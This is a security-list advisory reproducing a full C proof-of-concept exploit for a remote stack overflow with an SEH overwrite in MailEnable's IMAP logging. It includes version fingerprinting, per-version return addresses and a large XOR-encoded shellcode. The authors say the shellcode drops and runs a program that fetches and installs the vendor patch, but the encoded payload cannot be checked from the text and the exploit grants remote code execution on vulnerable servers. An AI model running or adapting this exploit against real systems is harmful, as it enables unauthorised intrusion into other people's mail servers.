[EXPL] MailEnable Logging Buffer Overflow (Nematoda, Exploit)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  MailEnable Logging Buffer Overflow (Nematoda, Exploit)
------------------------------------------------------------------------


SUMMARY

 <http://www.mailenable.com/> MailEnable's "mail server software provides 
a powerful, scalable hosted messaging platform for Microsoft Windows".

The following is a proof of concept for the MailEnable W3C Logging 
vulnerability. Unlike other exploit codes it features a special type of 
patching shellcode designed to quickly and easily secure this 
vulnerability across your network.

DETAILS

Vulnerable Systems:
 * MailEnable Professional version 1.6 and earlier
 * MailEnable Enterprise version 1.1 and earlier

Exploit:
/*
MailEnable W3C Logging Remote Buffer Overflow Proof of Concept

This is a pretty standard stack overflow with a SE handler overwrite.
The buffer used provides quite a bit of room for shellcode, so I've 
decided
to construct a shellcode that as far as I know hasn't been made. The
shellcode provided will transport a 1008 byte win32 PE executable file. 
The shellcode
will then save it to disk, run the executable, and close the server. The
executable will serve as a small patching tool, which will download the
patch provided by mailenable.com,unzip it, restart the service, and copy
the patched exe. This shellcode will eliminate the very hole it used to 
gain
access. The old server executable will not be deleted, merely renamed to
_MEIMAPS.exe.

For those paranoid individuals who cannot read C code, YOUR-Address can be
anything as long as the length is the same as the real IP. If your IP is
192.168.0.1, then 111.222.3.4 will work fine. We're only using it to
calculate the length of the buffer for stack alignment. As you can see,
there is no call home code here :)

If you have any questions about this exploit, or how you may use it on
your network to quickly patch your Mail Enable installations, please feel 
free to e-mail us
at advisory@wirecom.org
*/

#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")

long gimmeip(char *hostname);
void makeSpaceTaker(char *buff, int len);
char buffer[7300];
//Simple XOR'd 2-stage shellcode
//Some parts of this shellcode were taken from vlad902's toolset.
//Saves omg.exe to disk and runs.
char patchshell[]=
"\xEB\x17\x31\xC0\x66\xB8\x02\x05\x8B\x34"
"\x24\x66\x81\x36\x1E\x17\x83\xC6\x02\x83"
"\xE8\x02\x75\xF3\xC3\xE8\xE4\xFF\xFF\xFF"
"\xE2\xFF\xFB\x17\x1E\x17\x48\x9C\x5B\x2B"
"\x95\x6B\x1B\x6F\x1F\xF8\x95\x58\x06\x9C"
"\x41\x37\x1F\xFC\xFD\x39\x57\x9C\x2A\x9C"
"\x1F\xF9\x2F\xD7\x87\xBB\x9A\xD7\x6A\x10"
"\xDF\xDD\x13\x16\xDC\xFC\xEA\x2C\x4A\x33"
"\x16\x62\xFD\x9C\x41\x33\x1F\xFC\x78\x9C"
"\x12\x5C\x95\x48\x02\x16\xF5\x9C\x02\x9C"
"\x1F\xFC\x40\xD4\x76\x61\x73\xA7\x5B\xE8"
"\xC8\x43\x41\x41\x76\x17\x1F\x17\x1E\x40"
"\x76\x17\x1E\x17\x1E\xE8\xCD\x49\x1F\xF7"
"\x56\x97\x26\x4B\x6B\xED\xD8\x17\x1E\x7F"
"\x51\x14\xD9\xA8\xE1\xC1\x44\x43\xE1\xC4"
"\x76\xB2\x09\x17\x62\xE8\xC8\x7F\x7B\x6F"
"\x7B\x17\x76\x78\x73\x70\x30\x9E\xFF\x41"
"\x74\x17\x74\x17\x74\x13\x74\x17\x74\x17"
"\x74\x15\x4F\xE8\xCD\x49\x4E\x7F\x01\x6E"
"\x14\xFF\xE1\xC1\x46\x4F\x48\x47\x74\x17"
"\xF5\x4B\x44\x45\x76\xE7\x1D\x17\x1E\x96"
"\xDC\x13\x1E\x17\x1E\x45\x4E\xE8\xCD\x7F"
"\xE5\x80\xE3\x18\xE1\xC1\x46\x4F\x48\x47"
"\xE1\xC4\x40\x7F\x60\xCF\xFC\x64\xE1\xC1"
"\x97\x0B\x3A\x7F\x86\xE9\x94\x19\xE1\xC1"
"\x47\x9E\xFF\x96\xDF\x1F\x1E\x17\x1E\x7D"
"\x1E\x46\xE1\xC4\xDD\x26\xE8\x73\x95\x61"
"\x06\xBA\xB3\x9C\x76\xF3\x53\x71\x2F\xFA"
"\x78\x96\x63\x17\x53\x4D\x6B\xE3\x40\xFE"
"\x5C\xE8\xE1\xE8\xF6\x88\xE1\xE8\xE1\x56"
"\x5C\x54\x5A\x5A\x44\x87\x1E\x14\x1E\x17"
"\x1E\x13\x1E\x17\x1E\xE8\xE1\x17\x1E\xAF"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x57\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x97\x1E\x17\x1E\x19\x01\xAD"
"\x10\x17\xAA\x1E\xD3\x36\xA6\x16\x52\xDA"
"\x3F\x43\x76\x7E\x6D\x37\x6E\x65\x71\x70"
"\x6C\x76\x73\x37\x7D\x76\x70\x79\x71\x63"
"\x3E\x75\x7B\x37\x6C\x62\x70\x37\x77\x79"
"\x3E\x53\x51\x44\x3E\x7A\x71\x73\x7B\x39"
"\x13\x1A\x14\x33\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x47\x5B\x17\x1E\x5B\x1F\x16\x1E\xCF"
"\x35\x2D\x5D\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\xF7\x1E\x18\x1F\x1C\x1F\x15\x2C\x47"
"\x1C\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x57\x1C\x17\x1E\xB7\x1F\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x57\x1E\x07\x1E\x17"
"\x1E\x07\x1E\x17\x1E\x13\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x13\x1E\x17\x1E\x17\x1E\x17"
"\x1E\xE7\x1D\x17\x1E\xB7\x1F\x17\x1E\x17"
"\x1E\x17\x1E\x14\x1E\x17\x1E\x17\x1E\x07"
"\x1E\x17\x0E\x17\x1E\x17\x1E\x07\x1E\x17"
"\x0E\x17\x1E\x17\x1E\x17\x1E\x07\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x0F"
"\x1D\x17\x1E\x3F\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x77\x1D\x17"
"\x1E\x37\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x39"
"\x6A\x72\x66\x63\x1E\x17\x1E\x5F\x1C\x17"
"\x1E\xB7\x1F\x17\x1E\x47\x1C\x17\x1E\xB7"
"\x1F\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x37\x1E\x17\xFE\x7F"
"\x6A\x63\x6E\x2D\x31\x38\x69\x60\x69\x39"
"\x73\x76\x77\x7B\x7B\x79\x7F\x75\x72\x72"
"\x30\x74\x71\x7A\x31\x7F\x71\x63\x78\x7E"
"\x66\x38\x53\x52\x57\x5A\x5F\x47\x4D\x3A"
"\x4B\x47\x5A\x27\x2B\x26\x2E\x27\x2D\x27"
"\x2E\x27\x2E\x39\x64\x7E\x6E\x17\x78\x63"
"\x6E\x2D\x31\x38\x78\x63\x6E\x39\x6A\x7F"
"\x33\x64\x71\x71\x6A\x39\x7D\x78\x73\x38"
"\x4B\x59\x44\x5E\x4E\x39\x5B\x4F\x5B\x17"
"\x4B\x45\x52\x53\x71\x60\x70\x7B\x71\x76"
"\x7A\x43\x71\x51\x77\x7B\x7B\x56\x1E\x48"
"\x53\x52\x57\x5A\x5F\x47\x4D\x39\x5B\x4F"
"\x5B\x17\x70\x72\x6A\x37\x6D\x63\x7F\x65"
"\x6A\x37\x53\x52\x57\x5A\x5F\x47\x4D\x17"
"\x4B\x65\x72\x7A\x71\x79\x30\x73\x72\x7B"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x7F"
"\x0E\x30\x1E\x17\xF6\xB5\x1E\x17\x1E\x7F"
"\x33\x15\x5E\x17\xF6\x89\x1E\x17\x1E\xB4"
"\x26\x15\x5E\x17\x76\xEC\x1F\x57\x1E\xE8"
"\x2B\x2F\x1C\x57\x1E\xFF\x91\x17\x1E\x17"
"\xBD\x2B\x1C\x57\x1E\x7D\x1E\x7D\x1E\x7F"
"\xEF\x16\x5E\x17\x76\xCC\x1F\x57\x1E\x7D"
"\x1E\xE8\x0B\x2B\x1C\x57\x1E\x7D\x1E\x7D"
"\x1E\x7F\xCF\x16\x5E\x17\x76\xB7\x1F\x57"
"\x1E\x7D\x1E\xE8\x0B\x2B\x1C\x57\x1E\x7F"
"\x10\x15\x5E\x17\x76\x18\x1C\x57\x1E\xFF"
"\x4B\x17\x1E\x17\x76\xE6\x1F\x57\x1E\x7F"
"\xDA\x16\x5E\x17\xF6\x5B\x1E\x17\x1E\xD0"
"\x1B\xDA\x1F\x57\x1E\x37\x33\x78\x3E\x7D"
"\x1E\x7F\xDA\x16\x5E\x17\xF6\x2B\x1E\x17"
"\x1E\x7F\x0E\x30\x1E\x17\xF6\x03\x1E\x17"
"\x1E\x7D\x1E\x7F\x05\x15\x5E\x17\xF6\x31"
"\x1E\x17\x1E\x7D\x1E\xFF\x3B\x17\x1E\x17"
"\xD2\xE8\x3B\x77\x1D\x57\x1E\xE8\x3B\x73"
"\x1D\x57\x1E\xE8\x3B\x7F\x1D\x57\x1E\xE8"
"\x3B\x7B\x1D\x57\x1E\xE8\x3B\x67\x1D\x57"
"\x1E\xE8\x3B\x63\x1D\x57\x1E\xE8\x3B\x6F"
"\x1D\x57\x1E\xDB\xD2\x57\x1D\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\xCD\x1D\x17"
"\x1E\x77\x1D\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E\x17\x1E\x17\x1E\x97\x1D\x17\x1E\x9F"
"\x1D\x17\x1E\x8F\x1D\x17\x1E\xBD\x1D\x17"
"\x1E\xA1\x1D\x17\x1E\xD5\x1D\x17\x1E\xDB"
"\x1D\x17\x1E\x17\x1E\x17\x1E\x97\x1D\x17"
"\x1E\x9F\x1D\x17\x1E\x8F\x1D\x17\x1E\xBD"
"\x1D\x17\x1E\xA1\x1D\x17\x1E\xD5\x1D\x17"
"\x1E\xDB\x1D\x17\x1E\x17\x1E\x17\x1E\x64"
"\x1C\x44\x72\x72\x7B\x67\x1E\xBE\x1F\x5B"
"\x71\x76\x7A\x5B\x77\x75\x6C\x76\x6C\x6E"
"\x5F\x17\x1E\x3E\x1F\x50\x7B\x63\x4E\x65"
"\x71\x74\x5F\x73\x7A\x65\x7B\x64\x6D\x17"
"\x1E\xD3\x1F\x5A\x71\x61\x7B\x51\x77\x7B"
"\x7B\x56\x1E\xCB\x1C\x7B\x6D\x63\x6C\x74"
"\x6E\x6E\x5F\x17\x1E\xBA\x1C\x40\x77\x79"
"\x5B\x6F\x7B\x74\x1E\x62\x1E\x52\x66\x7E"
"\x6A\x47\x6C\x78\x7D\x72\x6D\x64\x1E\x5C"
"\x5B\x45\x50\x52\x52\x24\x2C\x39\x7A\x7B"
"\x72\x17\x1E\x17\x1E\x17\x1E\x17\x1E\x17"
"\x1E";

int main(int argc,char *argv[])
{
  WSADATA wsaData;
  struct sockaddr_in targetTCP, checkTCP;
  int sockTCP;
  double version=0; //1.6 is latest, diff offset
  unsigned short port = 143,bport=80;
  long ip;
  int size=3556;
  char checkBuf[512];
  if(argc < 3)
  {
   printf("MailEnable Remote Stack Overflow.\n"
    "Usage: %s [YOUR-Address] [Target-address] <server_port>\n"
    " eg: mailenable.exe 65.21.86.48 216.256.0.1\n"
    "It Is IMPORTANT that YOUR-Address section is the Address the remote 
server is going to see (your public IP).\n"
    "If you are unsure of what your public IP is you can try 
www.whatismyip.com.\n",argv[0]);
   return 1;
  }
  if(argc==4)
   port = atoi(argv[3]);
  WSAStartup(0x0202, &wsaData);
  printf("[*] Target:\t%s \tPort: %d\n",argv[2],port);
  ip=gimmeip(argv[2]);
  targetTCP.sin_family = AF_INET;
  targetTCP.sin_addr.s_addr = ip;
  targetTCP.sin_port = htons(port);
        
  //check SMTP port version
  checkTCP.sin_family = AF_INET;
  checkTCP.sin_addr.s_addr = ip;
  checkTCP.sin_port = htons(25);
  printf("[*] Checking SMTP version..\n");
  if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  {
   printf("[x] Socket not initialized! Exiting...\n");
   WSACleanup();
               return 1;
  }
  if(connect(sockTCP,(struct sockaddr *)&checkTCP, sizeof(checkTCP)) != 0)
  {
   printf("[*] Couldn't connect to SMTP to check version, assuming 
1.54...\n");
   version = 1.6;
  }
  else
  {
   if(recv(sockTCP,checkBuf,sizeof(checkBuf),0))
   {
    //first check if it's mailenable
    if(strstr(checkBuf,"MailEnable"))
    { //it is, get version
     if(strstr(checkBuf,"1.54"))
     {
      printf("[*] Version 1.54 detected..\n");
      version = 1.54;
     }
     if(strstr(checkBuf,"1.6"))
     {
      printf("[*] Version 1.6 detected..\n");
      version = 1.6;
     }
     if(strstr(checkBuf,"1.04") 
||strstr(checkBuf,"1.52")||strstr(checkBuf,"1.53") || 
strstr(checkBuf,"1.51"))
     {
       printf("[*] Version <1.54 detected..\n");
       version = 1.04;
     }
     if(version==0)
     {
      printf("[*] Version could not be determined. assuming 1.6\n");
      version=1.6;
     }
    }
    else
    {
     printf("[*] Erroneous banner recieved, assuming Version 1.6..\n");
     version = 1.6;
    }
   }
   else
   {
    printf("[*] Couldn't connect to SMTP to check version, assuming 
1.6...\n");
    version = 1.6;
   }
  }
  //form buffer here
  memset(buffer,'\0',7300);
  strcpy(buffer,"a01 SELECT ");
  size += (30-(strlen(argv[1])*2)); //IP length sizing
  size += sizeof(patchshell)-1;
  //fill buffer
  makeSpaceTaker(buffer,size);
  strcat(buffer,patchshell);
  strcat(buffer,"\xeb\x06\xeb\x06"); //SE chain.. JMP over
  if(version == 1.54)
  {
   strcat(buffer,"\x97\x6b\x01\x10"); //SE handler pop pop retn
   strcat(buffer,"\x90\x90\x90\xeb\x06\xeb"); //more jumping
   strcat(buffer,"\x97\x6b\x01\x10"); //SE handler pop pop retn
  }
  if(version == 1.6)
  {
   strcat(buffer,"\x77\x7A\x01\x10"); //SE handler pop pop retn
   strcat(buffer,"\x90\x90\x90\xeb\x06\xeb"); //more jumping
   strcat(buffer,"\x77\x7A\x01\x10"); //SE handler pop pop retn
  }
  if(version == 1.04)
  {
   strcat(buffer,"\x27\x74\x01\x10"); //SE handler pop pop retn
   strcat(buffer,"\x90\x90\x90\xeb\x06\xeb"); //more jumping
   strcat(buffer,"\x27\x74\x01\x10"); //SE handler pop pop retn
  }
  strcat(buffer,"\x90\x90\x90\xE8\xC7\xFA\xFF\xFF"); //call backwards
  makeSpaceTaker(buffer+strlen(buffer),640);
  strcat(buffer,"\r\n");
  //connect and overflow
  if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  {
    printf("[x] Socket not initialized! Exiting...\n");
    WSACleanup();
                return 1;
  }
  printf("[*] Socket initialized...\n");
  if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 
0)
  {
   printf("[*] Connection to host failed! Exiting...\n");
   WSACleanup();
   exit(1);
  }
  printf("[*] Sending buffer.\n");
  if(send(sockTCP,"a01 LOGIN patching mailserv\r\n",29,0) == -1)
  {
    printf("[x] Failed to inject packet! Exiting...\n");
    WSACleanup();
                return 1;
  }
  Sleep(1000);
  if (send(sockTCP, buffer, strlen(buffer),0) == -1)
  {
    printf("[x] Failed to inject packet! Exiting...\n");
    WSACleanup();
                return 1;
  }
  Sleep(500);
  closesocket(sockTCP);
  printf("[*] Payload sent. If vulnerable, the box should now be 
patched.\n");
  WSACleanup();
  return 0;
}

//Simple ip/hostname resolver taken from some random website
long gimmeip(char *hostname)
{
 struct hostent *he;
 long ipaddr;
 
 if ((ipaddr = inet_addr(hostname)) < 0)
 {
  if ((he = gethostbyname(hostname)) == NULL)
  {
   printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
   WSACleanup();
   exit(1);
  }
  memcpy(&ipaddr, he->h_addr, he->h_length);
 }
 return ipaddr;
}
//More interesting then memset :)
void makeSpaceTaker(char *buffer,int len)
{
 char 
fake[]="Patching_MailEnable_W3C_Logging_Buffer_Overflow_Vulnerability_";
 int cnt=0; //cnt amt written
 while(cnt <= len)
 {
  strcat(buffer,fake); //I know, but it's a big buffer
  cnt += strlen(fake);
 }
 memset(buffer+len+1,'\0',strlen(fake)); //null end and correct size
 
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:advisory@wirecom.org> 
wirecom.org.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.